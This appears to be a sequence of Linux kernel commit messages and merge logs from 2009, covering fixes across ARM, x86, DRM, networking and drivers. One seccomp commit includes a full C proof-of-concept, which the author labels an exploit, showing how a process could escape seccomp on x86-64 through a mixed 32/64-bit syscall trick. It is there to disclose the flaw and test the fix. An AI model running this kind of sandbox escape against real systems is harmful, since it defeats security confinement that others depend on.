gcc seems to expect that lr isn't clobbered by mcount, because for a
function starting with:

	static int func(void)
	{
		void *ra = __builtin_return_address(0);

		printk(KERN_EMERG "__builtin_return_address(0) = %pS\n", ra)

		...

the following assembler is generated by gcc 4.3.2:

	   0:   e1a0c00d        mov     ip, sp
	   4:   e92dd810        push    {r4, fp, ip, lr, pc}
	   8:   e24cb004        sub     fp, ip, #4      ; 0x4
	   c:   ebfffffe        bl      0 <mcount>
	  10:   e59f0034        ldr     r0, [pc, #52]
	  14:   e1a0100e        mov     r1, lr
	  18:   ebfffffe        bl      0 <printk>

Without this patch obviously __builtin_return_address(0) yields
func+0x10 instead of the return address of the caller.

Note this patch fixes a similar issue for the routines used with dynamic
ftrace even though this isn't currently selectable for ARM.

Cc: Abhishek Sagar <sagar.abhishek@gmail.com>
Cc: Steven Rostedt <rostedt@goodmis.org>
Cc: Ingo Molnar <mingo@elte.hu>
Signed-off-by: NUwe Kleine-König <u.kleine-koenig@pengutronix.de>
Signed-off-by: NRussell King <rmk+kernel@arm.linux.org.uk>

* 'merge' of git://git.kernel.org/pub/scm/linux/kernel/git/benh/powerpc:
  powerpc: Run sbc610 USB fixup code only on the appropriate platform.

[airlied: you shall not retype patches from other trees half asleep]
Signed-of-by: NDave Airlie <airlied@redhat.com>

commit a969e76a (powerpc: Correct USB
support for GE Fanuc SBC610) introduced a fixup for NEC usb controllers.
This fixup should only run on GEF SBC610 boards.

Fixes Fedora bug #486511.
(https://bugzilla.redhat.com/show_bug.cgi?id=486511)
Signed-off-by: NTony Breeds <tony@bakeyournoodle.com>
Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>

* git://git.kernel.org/pub/scm/linux/kernel/git/herbert/crypto-2.6:
  crypto: ixp4xx - Fix qmgr_request_queue build failure
  crypto: api - Fix module load deadlock with fallback algorithms

There is another user of IXP4xx queue manager, fix it.
Signed-off-by: NKrzysztof Hałasa <khc@pm.waw.pl>
Signed-off-by: NHerbert Xu <herbert@gondor.apana.org.au>

This data should be passed to the xor driver in order to initialize
the address decoding windows of the xor unit. without this patch, the
self tests of the xor will fail unless the address decoding windows were
initialized by the boot loader.
Signed-off-by: NSaeed Bishara <saeed@marvell.com>
Signed-off-by: NNicolas Pitre <nico@marvell.com>

Merge branch 'sched-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip

* 'sched-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip:
  sched: don't allow setuid to succeed if the user does not have rt bandwidth
  sched_rt: don't start timer when rt bandwidth disabled

Merge branch 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip

* 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip:
  x86: oprofile: don't set counter width from cpuid on Core2
  x86: fix init_memory_mapping() to handle small ranges

* 'tracing/mmiotrace' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip:
  x86 mmiotrace: fix race with release_kmmio_fault_page()
  x86 mmiotrace: improve handling of secondary faults
  x86 mmiotrace: split set_page_presence()
  x86 mmiotrace: fix save/restore page table state
  x86 mmiotrace: WARN_ONCE if dis/arming a page fails
  x86: add far read test to testmmiotrace
  x86: count errors in testmmiotrace.ko

Merge branch 'core-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip

* 'core-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip:
  rcu: Teach RCU that idle task is not quiscent state at boot

* master.kernel.org:/home/rmk/linux-2.6-arm:
  [ARM] fix lots of ARM __devexit sillyness
  [ARM] 5417/1: Set the correct cacheid for ARMv6 CPUs with ARMv7 style MMU
  [ARM] 5416/1: Use unused address in v6_early_abort
  [ARM] 5411/1: S3C64XX: Fix EINT unmask
  [ARM] at91: fix for Atmel AT91 powersaving
  [ARM] RiscPC: Fix etherh oops

`iop_adma_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o
`mv_xor_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o
`mv64xxx_i2c_unmap_regs' referenced in section `.devinit.text' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o
`mv64xxx_i2c_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o
`orion_nand_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o
`pxafb_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o
Acked-by: NUwe Kleine-König <u.kleine-koenig@pengutronix.de>
Signed-off-by: NRussell King <rmk+kernel@arm.linux.org.uk>

The cacheid_init() function assumes that if cpu_architecture() returns
7, the caches are VIPT_NONALIASING. The cpu_architecture() function
returns the version of the supported MMU features (e.g. TEX remapping)
but it doesn't make any assumptions about the cache type. The patch adds
the checking of the Cache Type Register for the ARMv7 format.
Signed-off-by: NCatalin Marinas <catalin.marinas@arm.com>
Signed-off-by: NRussell King <rmk+kernel@arm.linux.org.uk>

The target of the strex instruction to clear the exlusive monitor
is currently the top of the stack.  If the store succeeeds this
corrupts r0 in pt_regs.  Use the next stack location instead of
the current one to prevent any chance of corrupting an in-use
address.
Signed-off-by: NSeth Forshee <seth.forshee@gmail.com>
Signed-off-by: NRussell King <rmk+kernel@arm.linux.org.uk>

Impact: fix stuck NMIs and non-working oprofile on certain CPUs

Resetting the counter width of the performance counters on Intel's
Core2 CPUs, breaks the delivery of NMIs, when running in x86_64 mode.

This should fix bug #12395:

  http://bugzilla.kernel.org/show_bug.cgi?id=12395Signed-off-by: NTim Blechmann <tim@klingt.org>
Signed-off-by: NRobert Richter <robert.richter@amd.com>
LKML-Reference: <20090303100412.GC10085@erda.amd.com>
Cc: <stable@kernel.org>
Signed-off-by: NIngo Molnar <mingo@elte.hu>

Impact: fix failed EFI bootup in certain circumstances

Ying Huang found init_memory_mapping() has problem with small ranges
less than 2M when he tried to direct map the EFI runtime code out of
max_low_pfn_mapped.

It turns out we never considered that case and didn't check the range...
Reported-by: NYing Huang <ying.huang@intel.com>
Signed-off-by: NYinghai Lu <yinghai@kernel.org>
Cc: Brian Maly <bmaly@redhat.com>
LKML-Reference: <49ACDDED.1060508@kernel.org>
Signed-off-by: NIngo Molnar <mingo@elte.hu>

This reverts commit 155b25bc, which was
totally wrong - the "embedded" options still exists (very much so) even
on non-embedded platforms.

It's just that we don't bother with actually asking about them when
we're not embedded, we just take their default values (which is usually
'y' - the options add features that may not be worth it in a constrained
environment).
Noticed-by: NAndrew Morton <akpm@linux-foundation.org>
Cc: Randy Dunlap <randy.dunlap@oracle.com>
Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>

* 'drm-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/airlied/drm-2.6:
  drm/i915: Fix use-before-null-check in i915_irq_emit().
  drm: Avoid client deadlocks when the master disappears.
  drm: Wake up all lock waiters when the master disappears.
  drm: Don't return ERESTARTSYS to user-space.

This could be triggered by a client asking to emit an irq when the device
wasn't initialized.
Signed-off-by: NEric Anholt <eric@anholt.net>
Signed-off-by: NDave Airlie <airlied@linux.ie>

This is done by
1) Wake up lock waiters when we close the master file descriptor.
   Not when the master structure is removed, since the latter
   requires the waiters themselves to release the refcount on the
   master structure -> Deadlock.
2) Send a SIGTERM to all clients waiting for the lock.
   Normally these clients will get a SIGPIPE when the X server dies,
   but clients may also spin trying to grab the DRM lock, without
   getting any sort of notification.
Signed-off-by: NThomas Hellstrom <thellstrom@vmware.com>
Signed-off-by: NDave Airlie <airlied@linux.ie>

Currently only one waiter is woken up, leaving other waiters
hanging waiting for the DRM lock.
Signed-off-by: NThomas Hellstrom <thellstrom@vmware.com>
Signed-off-by: NDave Airlie <airlied@linux.ie>

That return code is for in-kernel use only.
Use EINTR instead.
Signed-off-by: NThomas Hellstrom <thellstrom@vmware.com>
Signed-off-by: NDave Airlie <airlied@linux.ie>

The COMPAT_BRK kconfig symbol does not depend on EMBEDDED, but it is in
the midst of the EMBEDDED menu symbols, so it mucks up the EMBEDDED
menu.  Fix by moving it to just after all of the EMBEDDED menu symbols.

Also, surround all of the EMBEDDED symbols with "if EMBEDDED"/"endif" so
that this EMBEDDED block is clearer.
Signed-off-by: NRandy Dunlap <randy.dunlap@oracle.com>
Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>

* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/drzeus/mmc:
  sdhci: Add NO_BUSY_IRQ quirk for Marvell CAFE host chip
  sdhci: Add quirk for controllers with no end-of-busy IRQ

* 'fix/hda' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound-2.6:
  ALSA: hda - Add probe_mask default for Toshiba laptop with ALC268
  ALSA: hda - Add quirk for new HP xw series
  ALSA: hda - Fix digital mic on dell-m4-1 and dell-m4-3

Merge branch 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip

* 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip:
  fix warning in io_mapping_map_wc()
  x86: i915 needs pgprot_writecombine() and is_io_mapping_possible()

* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6: (29 commits)
  zaurus: add usb id for motomagx phones
  usbnet: make usbnet_get_link() fall back to ethtool_op_get_link()
  veth: Fix carrier detect
  cdc_ether: add usb id for Ericsson F3507g
  r8169: read MAC address from EEPROM on init (2nd attempt)
  tcp: fix retrans_out leaks
  net headers: export dcbnl.h
  net headers: cleanup dcbnl.h
  netpoll: Add drop checks to all entry points
  gianfar: Do right check on num_txbdfree
  pkt_sched: sch_drr: Fix oops in drr_change_class.
  b44: Disable device on shutdown
  b44: Unconditionally enable interrupt routing on reset
  net: fix hp-plus build error
  libertas: fix misuse of netdev_priv() and dev->ml_priv
  ipv6: don't use tw net when accounting for recycled tw
  asix: new device ids
  tcp_scalable: Update malformed & dead url
  netfilter: xt_recent: fix proc-file addition/removal of IPv4 addresses
  netxen: handle pci bar 0 mapping failure
  ...

Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/jmorris/security-testing-2.6

* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/jmorris/security-testing-2.6:
  selinux: Fix a panic in selinux_netlbl_inode_permission()

Since I will loose the old address soon, please change it.
Signed-off-by: NKarsten Keil <kkeil@linux-pingi.de>
Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>

* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dtor/input:
  Input: elantech - touchpad driver miss-recognising logitech mice
  Input: synaptics - ensure we reset the device on resume
  Input: usbtouchscreen - fix eGalax HID ignoring
  Input: ambakmi - fix timeout handling in amba_kmi_write()
  Input: pxa930_trkball - fix write timeout handling
  Input: struct device - replace bus_id with dev_name(), dev_set_name()
  Input: bf54x-keys - fix debounce time validation
  Input: spitzkbd - mark probe function as __devinit
  Input: omap-keypad - mark probe function as __devinit
  Input: corgi_ts - mark probe function as __devinit
  Input: corgikbd - mark probe function as __devinit
  Input: uvc - the button on the camera is KEY_CAMERA
  Input: psmouse - make MOUSE_PS2_LIFEBOOK depend on X86
  Input: atkbd - make forced_release_keys[] static
  Input: usbtouchscreen - allow reporting calibrated data

* 'for_linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4:
  ext4: don't call jbd2_journal_force_commit_nested without journal
  ext4: Reorder fs/Makefile so that ext2 root fs's are mounted using ext2
  ext4: Remove duplicate call to ext4_commit_super() in ext4_freeze()

* git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi-rc-fixes-2.6:
  [SCSI] mpt: fix disable lsi sas to use msi as default
  [SCSI] fix ABORTED_COMMAND looping forever problem
  [SCSI] sd: revive sd_index_lock
  [SCSI] cxgb3i: update the driver version to 1.0.1
  [SCSI] cxgb3i: Fix spelling errors in documentation
  [SCSI] cxgb3i: added missing include in cxgb3i_ddp.h
  [SCSI] cxgb3i: Outgoing pdus need to observe skb's MAX_SKB_FRAGS
  [SCSI] cxgb3i: added per-task data to track transmit progress
  [SCSI] cxgb3i: transmit work-request fixes
  [SCSI] hptiop: Add new PCI device ID

On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}
Signed-off-by: NRoland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>

On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases, audit_syscall_entry() will use the wrong system
call number table and the wrong system call argument registers.  This
could be used to circumvent a syscall audit configuration that filters
based on the syscall numbers or argument details.
Signed-off-by: NRoland McGrath <roland@redhat.com>
Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>

As described here: http://lkml.org/lkml/2009/2/20/265

The CAFE chip is broken due to commit e809517f.
Anton added a quirk here: http://lkml.org/lkml/2009/2/20/279 that fixes
CAFE's problem.  This adds the quirk for CAFE.
Signed-off-by: NAndres Salomon <dilinger@debian.org>
Signed-off-by: NPierre Ossman <drzeus@drzeus.cx>

The Samsung SDHCI (and FSL eSDHC) controller block seems to fail
to generate an INT_DATA_END after the transfer has completed and
the bus busy state finished.

Changes in e809517f to use the
new busy method are the cause of the behaviour change.
Signed-off-by: NBen Dooks <ben-linux@fluff.org>
Signed-off-by: NAnton Vorontsov <avorontsov@ru.mvista.com>
Signed-off-by: NPierre Ossman <drzeus@drzeus.cx>

There was a theoretical possibility to a race between arming a page in
post_kmmio_handler() and disarming the page in
release_kmmio_fault_page():

cpu0                             cpu1
------------------------------------------------------------------
mmiotrace shutdown
enter release_kmmio_fault_page
                                 fault on the page
                                 disarm the page
disarm the page
                                 handle the MMIO access
                                 re-arm the page
put the page on release list
remove_kmmio_fault_pages()
                                 fault on the page
                                 page not known to mmiotrace
                                 fall back to do_page_fault()
                                 *KABOOM*

(This scenario also shows the double disarm case which is allowed.)

Fixed by acquiring kmmio_lock in post_kmmio_handler() and checking
if the page is being released from mmiotrace.
Signed-off-by: NPekka Paalanen <pq@iki.fi>
Cc: Stuart Bennett <stuart@freedesktop.org>
Cc: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: NIngo Molnar <mingo@elte.hu>